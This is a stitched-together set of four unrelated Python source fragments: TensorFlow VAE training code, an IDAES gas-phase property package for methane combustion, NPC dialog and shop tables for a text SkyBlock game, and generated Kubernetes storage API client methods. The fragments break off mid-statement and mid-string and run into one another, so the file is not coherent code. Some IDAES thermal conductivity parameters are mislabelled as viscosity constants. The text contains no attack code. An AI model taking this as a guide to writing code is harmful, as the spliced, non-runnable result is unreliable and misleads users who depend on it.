self._prior = Simple3DPrior("prior", shape=conv_z_shape)
if bijector_type == "iaf":
recog = DenseRecognitionIAF(
"recog", encoder=self._encoder, condition_iaf=condition_bijector)
elif bijector_type == "rnvp":
recog = DenseRecognitionRNVP(
"recog",
encoder=self._encoder,
condition_bijector=condition_bijector)
elif bijector_type == "shift_scale":
recog = DenseRecognition("recog", encoder=self._encoder)
elif bijector_type == "conv_shift_scale":
recog = ConvShiftScale("recog", encoder=self._encoder)
elif bijector_type == "affine":
recog = DenseRecognitionAffine("recog", encoder=self._encoder, z_dims=z_dims)
elif bijector_type == "conv_iaf":
recog = ConvIAF("recog", encoder=self._encoder, condition_iaf=condition_bijector)
elif bijector_type == "affine_lr":
recog = DenseRecognitionAffineLR("recog", encoder=self._encoder, z_dims=z_dims, rank=affine_rank)
# Drop the bijector return.
self._recog = lambda *args, **kwargs: recog(*args, **kwargs)[:2]
if dataset.name == "mnist":
self._noise = DenseMNISTNoise("noise", decoder=self._decoder)
else:
self._noise = DenseCIFAR10TNoise("noise", decoder=self._decoder)
def MakeVAE(self, images, beta_override=None, num_samples=64):
if beta_override is not None:
beta = beta_override
else:
beta = self._beta
return MakeVAE(images, self._recog, self._prior, self._noise, beta,
num_samples, self._min_kl)
def TrainOp(self, data_idx, images):
outputs = self.MakeVAE(images)
global_step = tf.train.get_or_create_global_step()
learning_rate = LearningRate(self.train_size, global_step)
opt = tf.train.AdamOptimizer(learning_rate=learning_rate)
metrics = {
"learning_rate": learning_rate,
"log_p_x_z": outputs.log_p_x_z,
"elbo": outputs.elbo,
"klqp": outputs.total_klqp,
"beta": self._beta,
}
for i, layer_klqp in enumerate(outputs.klqp):
metrics["klqp_%d"%i] = layer_klqp
utils.LogAndSummarizeMetrics(metrics, False)
tf.summary.image(
"sample_means", utils.StitchImages(outputs.sample_means))
return tf.contrib.training.create_train_op(
-outputs.elbo,
opt,
summarize_gradients=True,
transform_grads_fn=utils.ProcessGradients)
def GetPosterior(self, images):
outputs = self.MakeVAE(images)
return outputs.post_z
def EvalOp(self, data_idx, images):
outputs = self.MakeVAE(images, 1.0)
tf.summary.image("data", utils.StitchImages(images[:64]))
tf.summary.image(
"recon_means", utils.StitchImages(outputs.recon_means[:64]))
metrics = {
"elbo": outputs.elbo,
"klqp": outputs.total_klqp,
}
for i, layer_klqp in enumerate(outputs.klqp):
metrics["klqp_%d"%i] = layer_klqp
return utils.LogAndSummarizeMetrics(metrics)
def AIS(self, images, num_chains):
outputs = self.MakeVAE(images)
def ProposalLogProbFn(*z):
if self._use_q_z_for_ais:
_, log_p_z = self._recog(images, z=z)
else:
_, log_p_z = self._prior(z)
return tf.add_n(log_p_z)
def TargetLogProbFn(*z):
_, log_p_z = self._prior(z)
_, log_p_x_z = self._noise(images, z)
return tf.add_n(log_p_z) + log_p_x_z
images = tf.tile(images, [num_chains, 1, 1, 1])
if self._use_q_z_for_ais:
z_init, _ = self._recog(images)
else:
      z_init, _ = self._prior(batch=tf.shape(images)[0])
#################################################################################
# The Institute for the Design of Advanced Energy Systems Integrated Platform
# Framework (IDAES IP) was produced under the DOE Institute for the
# Design of Advanced Energy Systems (IDAES), and is copyright (c) 2018-2021
# by the software owners: The Regents of the University of California, through
# Lawrence Berkeley National Laboratory, National Technology & Engineering
# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia University
# Research Corporation, et al. All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and
# license information.
#################################################################################
"""
This package provides the necessary constraints for gas phase properties for
the CLC of methane
Components - Methane (CH4), Carbon Dioxide (CO2), Water (H2O)
Equations written in this model were derived from:
(1) <NAME>, <NAME>, <NAME>, The Properties of Gases and
Liquids, Mcgraw-Hill, New York, 2001.
(2) National Institute of Standards and Technology, NIST Chemistry WebBook,
https://webbook.nist.gov/chemistry/ (accessed March 10, 2018).
"""
# Import Pyomo libraries
from pyomo.environ import (Constraint,
Expression,
Param,
Reals,
value,
log,
Var,
units as pyunits)
from pyomo.util.calc_var_value import calculate_variable_from_constraint
# Import IDAES cores
from idaes.core import (declare_process_block_class,
MaterialFlowBasis,
PhysicalParameterBlock,
StateBlockData,
StateBlock,
MaterialBalanceType,
EnergyBalanceType,
Component,
VaporPhase)
from idaes.core.util.initialization import (fix_state_vars,
revert_state_vars,
solve_indexed_blocks)
from idaes.core.util.misc import add_object_reference
from idaes.core.util.model_statistics import (
degrees_of_freedom,
number_unfixed_variables_in_activated_equalities)
from idaes.core.util.constants import Constants
import idaes.logger as idaeslog
from idaes.core.util import scaling as iscale
from idaes.core.solvers import get_solver
# Some more information about this module
__author__ = "<NAME>"
# Set up logger
_log = idaeslog.getLogger(__name__)
@declare_process_block_class("GasPhaseParameterBlock")
class PhysicalParameterData(PhysicalParameterBlock):
"""
Property Parameter Block Class
Contains parameters and indexing sets associated with properties for
methane CLC.
"""
def build(self):
'''
Callable method for Block construction.
'''
super(PhysicalParameterData, self).build()
self._state_block_class = GasPhaseStateBlock
# Create Phase object
self.Vap = VaporPhase()
# Create Component objects
self.CH4 = Component()
self.CO2 = Component()
self.H2O = Component()
# -------------------------------------------------------------------------
""" Pure gas component properties"""
# Mol. weights of gas - units = kg/mol. ref: NIST webbook
mw_comp_dict = {'CH4': 0.016, 'CO2': 0.044, 'H2O': 0.018}
# Molecular weight should be defined in default units
# (default mass units)/(default amount units)
# per the define_meta.add_default_units method below
self.mw_comp = Param(
self.component_list,
mutable=False,
initialize=mw_comp_dict,
doc="Molecular weights of gas components [kg/mol]",
units=pyunits.kg/pyunits.mol)
# Std. heat of formation of comp. - units = J/(mol comp) - ref: NIST
enth_mol_form_comp_dict = {'CH4': -74.8731E3, 'CO2': -393.5224E3,
'H2O': -241.8264E3}
self.enth_mol_form_comp = Param(
self.component_list,
mutable=False,
initialize=enth_mol_form_comp_dict,
doc="Component molar heats of formation [J/mol]",
units=pyunits.J/pyunits.mol)
# Ideal gas spec. heat capacity parameters(Shomate) of
# components - ref: NIST webbook. Shomate equations from NIST.
# Parameters A-E are used for cp calcs while A-H are used for enthalpy
# calc.
# cp_comp = A + B*T + C*T^2 + D*T^3 + E/(T^2)
# where T = Temperature (K)/1000, and cp_comp = (J/mol.K)
# H_comp = H - H(298.15) = A*T + B*T^2/2 + C*T^3/3 +
# D*T^4/4 - E/T + F - H where T = Temp (K)/1000 and H_comp = (kJ/mol)
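        # As an illustrative sketch (not used directly by the property
        # calculations below), cp for one component would be assembled from
        # these parameters as:
        #   t = T / 1000            # T in K
        #   cp = A + B*t + C*t**2 + D*t**3 + E/t**2   # J/mol/K
        # with A..E taken from cp_param_1..cp_param_5 for that component.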
cp_param_dict = {
('CH4', 1): -0.7030290,
('CH4', 2): 108.4773000,
('CH4', 3): -42.5215700,
('CH4', 4): 5.8627880,
('CH4', 5): 0.6785650,
('CH4', 6): -76.8437600,
('CH4', 7): 158.7163000,
('CH4', 8): -74.8731000,
('CO2', 1): 24.9973500,
('CO2', 2): 55.1869600,
('CO2', 3): -33.6913700,
('CO2', 4): 7.9483870,
('CO2', 5): -0.1366380,
('CO2', 6): -403.6075000,
('CO2', 7): 228.2431000,
('CO2', 8): -393.5224000,
('H2O', 1): 30.0920000,
('H2O', 2): 6.8325140,
('H2O', 3): 6.7934350,
('H2O', 4): -2.5344800,
('H2O', 5): 0.0821390,
('H2O', 6): -250.8810000,
('H2O', 7): 223.3967000,
('H2O', 8): -241.8264000
}
self.cp_param_1 = Param(
self.component_list,
mutable=False,
initialize={k: v for (k, j), v in
cp_param_dict.items() if j == 1},
doc="Shomate equation heat capacity coeff 1",
units=pyunits.J/pyunits.mol/pyunits.K)
self.cp_param_2 = Param(
self.component_list,
mutable=False,
initialize={k: v for (k, j), v in
cp_param_dict.items() if j == 2},
doc="Shomate equation heat capacity coeff 2",
units=pyunits.J/pyunits.mol/pyunits.K/pyunits.kK)
self.cp_param_3 = Param(
self.component_list,
mutable=False,
initialize={k: v for (k, j), v in
cp_param_dict.items() if j == 3},
doc="Shomate equation heat capacity coeff 3",
units=pyunits.J/pyunits.mol/pyunits.K/pyunits.kK**2)
self.cp_param_4 = Param(
self.component_list,
mutable=False,
initialize={k: v for (k, j), v in
cp_param_dict.items() if j == 4},
doc="Shomate equation heat capacity coeff 4",
units=pyunits.J/pyunits.mol/pyunits.K/pyunits.kK**3)
self.cp_param_5 = Param(
self.component_list,
mutable=False,
initialize={k: v for (k, j), v in
cp_param_dict.items() if j == 5},
doc="Shomate equation heat capacity coeff 5",
units=pyunits.J/pyunits.mol/pyunits.K*pyunits.kK**2)
self.cp_param_6 = Param(
self.component_list,
mutable=False,
initialize={k: v for (k, j), v in
cp_param_dict.items() if j == 6},
doc="Shomate equation heat capacity coeff 6",
units=pyunits.kJ/pyunits.mol)
self.cp_param_7 = Param(
self.component_list,
mutable=False,
initialize={k: v for (k, j), v in
cp_param_dict.items() if j == 7},
doc="Shomate equation heat capacity coeff 7",
units=pyunits.J/pyunits.mol/pyunits.K)
self.cp_param_8 = Param(
self.component_list,
mutable=False,
initialize={k: v for (k, j), v in
cp_param_dict.items() if j == 8},
doc="Shomate equation heat capacity coeff 8",
units=pyunits.kJ/pyunits.mol)
# Viscosity constants:
# Reference: Perry and Green Handbook; <NAME>, 2008
visc_d_param_dict = {('CH4', 1): 5.2546e-7, ('CH4', 2): 0.59006,
('CH4', 3): 105.67, ('CH4', 4): 0,
('CO2', 1): 2.148e-6, ('CO2', 2): 0.46,
('CO2', 3): 290, ('CO2', 4): 0,
('H2O', 1): 1.7096e-8, ('H2O', 2): 1.1146,
('H2O', 3): 0, ('H2O', 4): 0}
self.visc_d_param_1 = Param(self.component_list,
mutable=True,
initialize={k: v for (k, j), v in
visc_d_param_dict.items()
if j == 1},
doc="Dynamic viscosity constants",
units=pyunits.kg/pyunits.m/pyunits.s)
# The units of parameter 1 are dependent upon the value of parameter 2:
# [visc_d_param_1] = kg/m-s * K^(-(value([visc_d_param_2)))
# this is accounted for in the equation on line 655
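        # For reference, these four constants are normally used in the
        # DIPPR/Perry-style correlation (a sketch of the intended form only;
        # the actual constraint lives in the state block):
        #   visc_d_comp[j] = C1 * T**C2 / (1 + C3/T + C4/T**2)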
self.visc_d_param_2 = Param(self.component_list,
mutable=True,
initialize={k: v for (k, j), v in
visc_d_param_dict.items()
if j == 2},
doc="Dynamic viscosity constants",
units=pyunits.dimensionless)
self.visc_d_param_3 = Param(self.component_list,
mutable=True,
initialize={k: v for (k, j), v in
visc_d_param_dict.items()
if j == 3},
doc="Dynamic viscosity constants",
units=pyunits.K)
self.visc_d_param_4 = Param(self.component_list,
mutable=True,
initialize={k: v for (k, j), v in
visc_d_param_dict.items()
if j == 4},
doc="Dynamic viscosity constants",
units=pyunits.K**2)
# Thermal conductivity constants:
# Reference: Perry and Green Handbook; <NAME>, 2008
therm_cond_param_dict = {('CH4', 1): 8.3983e-6, ('CH4', 2): 1.4268,
('CH4', 3): -49.654, ('CH4', 4): 0,
('CO2', 1): 3.69, ('CO2', 2): -0.3838,
('CO2', 3): 964, ('CO2', 4): 1.86e6,
('H2O', 1): 6.204e-6, ('H2O', 2): 1.3973,
('H2O', 3): 0, ('H2O', 4): 0}
self.therm_cond_param_1 = Param(
self.component_list,
mutable=True,
initialize={k: v for (k, j), v in
therm_cond_param_dict.items()
if j == 1},
doc="Dynamic viscosity constants",
units=pyunits.J/pyunits.m/pyunits.s)
# The units of parameter 1 are dependent upon the value of parameter 2:
# [therm_cond_param_1] = J/m-s * K^(-(1 + value([therm_cond_param_2)))
# this is accounted for in the equation on line 734
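        # These follow the same Perry-style form as the viscosity constants
        # above (again only a sketch; see the state block for the actual
        # constraint):
        #   therm_cond_comp[j] = C1 * T**C2 / (1 + C3/T + C4/T**2)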
self.therm_cond_param_2 = Param(
self.component_list,
mutable=True,
initialize={k: v for (k, j), v in
therm_cond_param_dict.items()
if j == 2},
doc="Dynamic viscosity constants",
units=pyunits.dimensionless)
self.therm_cond_param_3 = Param(
self.component_list,
mutable=True,
initialize={k: v for (k, j), v in
therm_cond_param_dict.items()
if j == 3},
doc="Dynamic viscosity constants",
units=pyunits.K)
self.therm_cond_param_4 = Param(
self.component_list,
mutable=True,
initialize={k: v for (k, j), v in
therm_cond_param_dict.items()
if j == 4},
doc="Dynamic viscosity constants",
units=pyunits.K**2)
# Component diffusion volumes:
# Ref: (1) Prop gas & liquids (2) Fuller et al. IECR, 58(5), 19, 1966
diff_vol_param_dict = {'CH4': 24.42, 'CO2': 26.9, 'H2O': 13.1}
self.diff_vol_param = Param(self.component_list,
mutable=True,
initialize=diff_vol_param_dict,
doc="Component diffusion volumes",
units=pyunits.dimensionless)
# Set default scaling for state variables
self.set_default_scaling("flow_mol", 1e-3)
self.set_default_scaling("pressure", 1e-5)
self.set_default_scaling("temperature", 1e-2)
for comp in self.component_list:
self.set_default_scaling("mole_frac_comp", 1e1, index=comp)
# Set default scaling for thermophysical and transport properties
self.set_default_scaling("enth_mol", 1e-6)
self.set_default_scaling("enth_mol_comp", 1e-6)
self.set_default_scaling("cp_mol", 1e-6)
self.set_default_scaling("cp_mol_comp", 1e-6)
self.set_default_scaling("cp_mass", 1e-6)
self.set_default_scaling("entr_mol", 1e-2)
self.set_default_scaling("entr_mol_phase", 1e-2)
self.set_default_scaling("dens_mol_comp", 1)
self.set_default_scaling("dens_mass", 1e2)
self.set_default_scaling("visc_d_comp", 1e4)
self.set_default_scaling("diffusion_comp", 1e5)
self.set_default_scaling("therm_cond_comp", 1e2)
self.set_default_scaling("visc_d", 1e5)
self.set_default_scaling("therm_cond", 1e0)
self.set_default_scaling("mw", 1e2)
@classmethod
def define_metadata(cls, obj):
obj.add_properties({
'flow_mol': {'method': None, 'units': 'mol/s'},
'pressure': {'method': None, 'units': 'bar'},
'temperature': {'method': None, 'units': 'K'},
'mole_frac_comp': {'method': None, 'units': None},
'mw': {'method': '_mw', 'units': 'kg/mol'},
'cp_mol': {'method': '_cp_mol', 'units': 'J/mol.K'},
'cp_mol_comp': {'method': '_cp_mol_comp',
'units': 'J/mol.K'},
'cp_mass': {'method': '_cp_mass', 'units': 'J/kg.K'},
'dens_mol': {'method': '_dens_mol',
'units': 'mol/m^3'},
'dens_mol_comp': {'method': '_dens_mol_comp',
'units': 'mol/m^3'},
'dens_mass': {'method': '_dens_mass',
'units': 'kg/m^3'},
'enth_mol': {'method': '_enth_mol', 'units': 'J/mol'},
'enth_mol_comp': {'method': '_enth_mol_comp',
'units': 'J/mol'},
'entr_mol': {'method': '_entr_mol', 'units': 'J/mol.K'},
'entr_mol_phase': {'method': '_entr_mol',
'units': 'J/mol/K'},
'visc_d': {'method': '_visc_d', 'units': 'kg/m.s'},
'therm_cond': {'method': '_therm_cond', 'units': 'J/m.K.s'},
'diffusion_comp': {'method': '_diffusion_comp',
'units': 'cm2/s'}})
obj.add_default_units({'time': pyunits.s,
'length': pyunits.m,
'mass': pyunits.kg,
'amount': pyunits.mol,
'temperature': pyunits.K,
})
class _GasPhaseStateBlock(StateBlock):
"""
This Class contains methods which should be applied to State Blocks as a
whole, rather than individual elements of indexed State Blocks.
"""
def initialize(blk, state_args=None, hold_state=False,
state_vars_fixed=False, outlvl=idaeslog.NOTSET,
solver=None, optarg=None):
"""
Initialization routine for property package.
        Keyword Arguments:
from ...constant.colors import *
from ...object.object import *
from ..object import *
from .function import reforge
HUB_NPCS = [
Npc('adventurer',
init_dialog=[
("I've seen it all - every island"
" from here to the edge of the world!"),
("Over the years I've acquired"
" a variety of Talismans and Artifacts."),
'For a price, you can have it all!',
'Talk to me again to open the Adventurer Shop!',
],
trades=[
(8, {'name': 'rotten_flesh'}),
(8, {'name': 'bone'}),
(10, {'name': 'string'}),
(14, {'name': 'slime_ball'}),
(10, {'name': 'gunpowder'}),
(500, {'name': 'zombie_talisman'}),
(500, {'name': 'skeleton_talisman'}),
(2500, {'name': 'village_affinity_talisman'}),
(2500, {'name': 'mine_affinity_talisman'}),
(10000, {'name': 'intimidation_talisman'}),
(10000, {'name': 'scavenger_talisman'}),
]),
Npc('alchemist',
init_dialog=[
'There is a darkness in you, adventurer.',
"I've seen it in my flames, you are destined for great things.",
"For now, you shouldn't let it get to your head.",
'Talk to me again to open the Alchemist Shop!',
],
trades=[
(10, {'name': 'nether_wart'}),
(6, {'name': 'bottle'}),
(4, {'name': 'sugar'}),
(10, {'name': 'rabbit_foot'}),
(12, {'name': 'spider_eye'}),
(12, {'name': 'blaze_powder'}),
(200, {'name': 'ghast_tear'}),
(20, {'name': 'magma_cream'}),
]),
Npc('andrew',
dialog=[
(f"This game is still under heavy development,"
f" don't forget to check {GREEN}GitHub{WHITE} often for updates!"),
(f"If you'd like to discuss SkyBlock with other players"
f" then check out the SkyBlock respository"
f" on {GREEN}GitHub{WHITE}!"),
]),
Npc('anita'),
Npc('armorsmith',
init_dialog=[
'A great warrior is nothing without their armor!',
'Talk to me again to open the Armorsmith Shop!',
],
trades=[
(8, {'name': 'leather_helmet'}),
(14, {'name': 'leather_chestplate'}),
(16, {'name': 'leather_leggings'}),
(10, {'name': 'leather_boots'}),
(15, {'name': 'iron_helmet'}),
(20, {'name': 'iron_chestplate'}),
(30, {'name': 'iron_leggings'}),
(20, {'name': 'iron_boots'}),
(350, {'name': 'diamond_helmet',
'enchantments': {'growth': 1}}),
(440, {'name': 'diamond_chestplate',
'enchantments': {'growth': 1}}),
(400, {'name': 'diamond_leggings',
'enchantments': {'growth': 1}}),
(320, {'name': 'diamond_boots',
'enchantments': {'growth': 1}}),
]),
Npc('banker',
dialog=[
'Hello there!',
('You may want to store your coins in a safe place'
' while you are off adventuring.'),
('Leave your coins with me and you will also earn interest'
' at the start of every season!'),
]),
Npc('bea',
init_dialog=[
'Hello! Do you have a pet?',
'Pets are little companions for your adventures in SkyBlock!',
'Personally, I prefer the bee pet!',
],
trades=[
((4999,
{'name': 'coal_block', 'count': 2},
{'name': 'gold_block', 'count': 2}),
{'name': 'bee_pet', 'rarity': 'common'}),
((50000,
{'name': 'coal_block', 'count': 128},
{'name': 'gold_block', 'count': 128}),
{'name': 'bee_pet', 'rarity': 'rare'}),
((200000,
{'name': 'enchanted_coal_block'},
{'name': 'enchanted_gold_block'}),
{'name': 'bee_pet', 'rarity': 'epic'}),
((650000,
{'name': 'enchanted_coal_block', 'count': 8},
{'name': 'enchanted_gold_block', 'count': 8}),
{'name': 'bee_pet', 'rarity': 'legendary'}),
]),
Npc('blacksmith', function=reforge),
Npc('builder',
init_dialog=[
'If you build, they will come!',
'Talk to me again to open the Builder Shop!',
],
trades=[
(1, {'name': 'planks'}),
(4, {'name': 'glass'}),
(22, {'name': 'gravel'}),
(69, {'name': 'obsidian'}),
(1, {'name': 'cobblestone'}),
(1, {'name': 'sand'}),
(3, {'name': 'oak_leaves'}),
(3, {'name': 'birch_leaves'}),
(3, {'name': 'spruce_leaves'}),
(3, {'name': 'dark_oak_leaves'}),
(3, {'name': 'acacia_leaves'}),
(3, {'name': 'jungle_leaves'}),
(1, {'name': 'oak_sapling'}),
(1, {'name': 'birch_sapling'}),
(1, {'name': 'spruce_sapling'}),
(1, {'name': 'dark_oak_sapling'}),
(1, {'name': 'acacia_sapling'}),
(1, {'name': 'jungle_sapling'}),
(35, {'name': 'dandelion'}),
(35, {'name': 'poppy'}),
(1, {'name': 'netherrack'}),
(560, {'name': 'sponge'}),
]),
Npc('duke',
dialog=[
'Are you new here? As you can see there is a lot to explore!',
(f'My advice is to start by visiting the {AQUA}Farm{WHITE},'
f' or the {AQUA}Coal Mine{WHITE} both North of here.'),
(f'If you do need some wood, the best place '
f'to get some is West of the {AQUA}Village{WHITE}!'),
]),
Npc('farm_merchant',
init_dialog=[
'You can buy and sell harvested crops with me!',
'Wheat, carrots, potatoes, and melon are my specialties!',
'Talk to me again to open the Farmer Shop!',
],
trades=[
(7 / 3, {'name': 'wheat'}),
(7 / 3, {'name': 'carrot'}),
(7 / 3, {'name': 'potato'}),
(8, {'name': 'pumpkin'}),
(2, {'name': 'melon'}),
(12, {'name': 'red_mushroom'}),
(12, {'name': 'brown_mushroom'}),
(5, {'name': 'cocoa'}),
(5, {'name': 'sugar_cane'}),
(4, {'name': 'sand'}),
(10, {'name': 'rookie_hoe'}),
]),
Npc('fish_merchant',
init_dialog=[
('Fishing is my trade. I buy and sell any fish,'
' rod, or treasure you can find!'),
'Talk to me again to open the Fisherman Shop!',
],
trades=[
(100, {'name': 'fishing_rod',
'enchantments': {'magnet': 1}}),
(20, {'name': 'fish'}),
(30, {'name': 'salmon'}),
(100, {'name': 'clownfish'}),
(40, {'name': 'pufferfish'}),
]),
Npc('jack',
dialog=[
"Use 'stats' to show details about your current stats!",
(f'There are 7 stats in total, including {RED}❤ Health{WHITE},'
f' {RED}❁ Strength{WHITE}, and {GREEN}❈ Defense{WHITE}.'),
('Equipped armor, weapons, and accessories in your inventory'
' all improve your stats.'),
('Additionally, leveling your Skills can permanently'
' boost some of your stats!'),
]),
Npc('jacob',
dialog=[[
'Howdy!',
'I organize farming contests once every few days!',
'You need Farming X to participate! :)',
]]),
Npc('jamie',
init_dialog=[
'You might have noticed that you have a Mana bar!',
'Some items have mysterious properties, called Abilities.',
("Abilities use your Mana as a resource. "
"Here, take this Rogue Sword. I don't need it!"),
],
claim_item={'name': 'rogue_sword'}),
Npc('liam',
dialog=[
'One day those houses in the Village will be rentable for Coins!',
'Anyone will be able to rent them, players, co-ops, even Guilds!',
]),
Npc('librarian',
init_dialog=[
'Greetings! Welcome to the Library!',
('The Library is your one-stop shop for all things enchanting.'
' Enchant items, purchase Enchanted Books, and more'),
('You can enchant items with `enchant`.'
' Enchanting costs experience levels -'
' the more levels you spend, the better enchantments'
' you will receive.'),
'Use `enchant` to enchant an item!',
],
trades=[
(30, {'name': 'experience_bottle'}),
]),
Npc('lonely_philosopher',
init_dialog=['To fast travel or not to fast travel?'],
trades=[
(150_000, {'name': 'travel_scroll_to_castle'}),
]),
Npc('lumber_merchant',
init_dialog=[
'Buy and sell wood and axes with me!',
'Talk to me again to open the Lumberjack Shop!',
],
trades=[
(5, {'name': 'oak_wood'}),
(5, {'name': 'birch_wood'}),
(5, {'name': 'spruce_wood'}),
(5, {'name': 'dark_oak_wood'}),
(5, {'name': 'acacia_wood'}),
(5, {'name': 'jungle_wood'}),
(12, {'name': 'rookie_axe'}),
(35, {'name': 'promising_axe'}),
(100, {'name': 'sweet_axe'}),
(100, {'name': 'efficient_axe'}),
]),
Npc('mine_merchant',
init_dialog=[
'My specialties are ores, stone, and mining equipment.',
'Talk to me again to open the Miner Shop!',
],
trades=[
(4, {'name': 'coal'}),
(5.5, {'name': 'iron'}),
(6, {'name': 'gold'}),
(12, {'name': 'rookie_pickaxe'}),
(35, {'name': 'promising_pickaxe'}),
(({'name': 'gold', 'count': 3},),
{'name': 'golden_pickaxe'}),
(6, {'name': 'gravel'}),
(3, {'name': 'cobblestone'}),
]),
Npc('oringo',
trades=[
((10000,
{'name': 'fish', 'count': 64}),
{'name': 'blue_whale_pet', 'rarity': 'common'}),
((25000,
{'name': 'enchanted_fish'}),
{'name': 'blue_whale_pet', 'rarity': 'uncommon'}),
((100000,
{'name': 'enchanted_fish', 'count': 16}),
{'name': 'blue_whale_pet', 'rarity': 'rare'}),
((1000000,
{'name': 'enchanted_cooked_fish'}),
{'name': 'blue_whale_pet', 'rarity': 'epic'}),
((10000000,
{'name': 'enchanted_cooked_fish', 'count': 8}),
{'name': 'blue_whale_pet', 'rarity': 'legendary'}),
((10000,
{'name': 'beef', 'count': 64}),
{'name': 'lion_pet', 'rarity': 'common'}),
((25000,
{'name': 'enchanted_beef', 'count': 2}),
{'name': 'lion_pet', 'rarity': 'uncommon'}),
((100000,
{'name': 'enchanted_beef', 'count': 32}),
{'name': 'lion_pet', 'rarity': 'rare'}),
((1000000,
{'name': 'enchanted_beef', 'count': 256}),
{'name': 'lion_pet', 'rarity': 'epic'}),
((15000000,
{'name': 'enchanted_beef', 'count': 1024}),
{'name': 'lion_pet', 'rarity': 'legendary'}),
((10000,
{'name': 'chicken', 'count': 128}),
{'name': 'tiger_pet', 'rarity': 'common'}),
((25000,
{'name': 'enchanted_chicken', 'count': 2}),
{'name': 'tiger_pet', 'rarity': 'uncommon'}),
((100000,
{'name': 'enchanted_chicken', 'count': 32}),
{'name': 'tiger_pet', 'rarity': 'rare'}),
((1000000,
{'name': 'enchanted_chicken', 'count': 256}),
{'name': 'tiger_pet', 'rarity': 'epic'}),
((15000000,
{'name': 'enchanted_chicken', 'count': 1024}),
{'name': 'tiger_pet', 'rarity': 'legendary'}),
((10000,
{'name': 'acacia_wood', 'count': 64}),
{'name': 'giraffe_pet', 'rarity': 'common'}),
((25000,
{'name': 'enchanted_acacia'}),
{'name': 'giraffe_pet', 'rarity': 'uncommon'}),
((100000,
{'name': 'enchanted_acacia', 'count': 16}),
{'name': 'giraffe_pet', 'rarity': 'rare'}),
((1000000,
{'name': 'enchanted_acacia', 'count': 128}),
{'name': 'giraffe_pet', 'rarity': 'epic'}),
((10000000,
{'name': 'enchanted_acacia', 'count': 512}),
{'name': 'giraffe_pet', 'rarity': 'legendary'}),
((10000,
{'name': 'dark_oak_wood', 'count': 64}),
{'name': 'elephant_pet', 'rarity': 'common'}),
((25000,
{'name': 'enchanted_dark_oak'}),
{'name': 'elephant_pet', 'rarity': 'uncommon'}),
((100000,
{'name': 'enchanted_dark_oak', 'count': 16}),
{'name': 'elephant_pet', 'rarity': 'rare'}),
((1000000,
{'name': 'enchanted_dark_oak', 'count': 128}),
{'name': 'elephant_pet', 'rarity': 'epic'}),
((15000000,
{'name': 'enchanted_dark_oak', 'count': 512}),
{'name': 'elephant_pet', 'rarity': 'legendary'}),
((10000,
{'name': 'jungle_wood', 'count': 64}),
{'name': 'monkey_pet', 'rarity': 'common'}),
((25000,
{'name': 'enchanted_jungle'}),
{'name': 'monkey_pet', 'rarity': 'uncommon'}),
((100000,
{'name': 'enchanted_jungle', 'count': 16}),
{'name': 'monkey_pet', 'rarity': 'rare'}),
((1000000,
{'name': 'enchanted_jungle', 'count': 128}),
{'name': 'monkey_pet', 'rarity': 'epic'}),
((18000000,
{'name': 'enchanted_jungle', 'count': 512}),
{'name': 'monkey_pet', 'rarity': 'legendary'}),
]),
Npc('pat',
init_dialog=[
'You like flint? I like flint! I sell flint!',
("My brother is mining the gravel from the Spider's Den."
" We are the Flint Bros!"),
'Talk to me again to open my shop!',
],
trades=[
(6, {'name': 'flint'}),
(4, {'name': 'gravel'}),
]),
Npc('ryu',
dialog=[
'There are 9 Skills in SkyBlock!',
('Farming, Mining, Foraging, Fishing,
the required parameter `name` when calling `delete_storage_v1beta1_storage_class`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `delete_storage_v1beta1_storage_class`")
collection_formats = {}
resource_path = '/apis/storage.k8s.io/v1beta1/storageclasses/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UnversionedStatus',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def get_storage_v1beta1_api_resources(self, **kwargs):
"""
get available resources
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_storage_v1beta1_api_resources(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: UnversionedAPIResourceList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_storage_v1beta1_api_resources_with_http_info(**kwargs)
else:
(data) = self.get_storage_v1beta1_api_resources_with_http_info(**kwargs)
return data
def get_storage_v1beta1_api_resources_with_http_info(self, **kwargs):
"""
get available resources
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_storage_v1beta1_api_resources_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: UnversionedAPIResourceList
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_storage_v1beta1_api_resources" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/apis/storage.k8s.io/v1beta1/'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
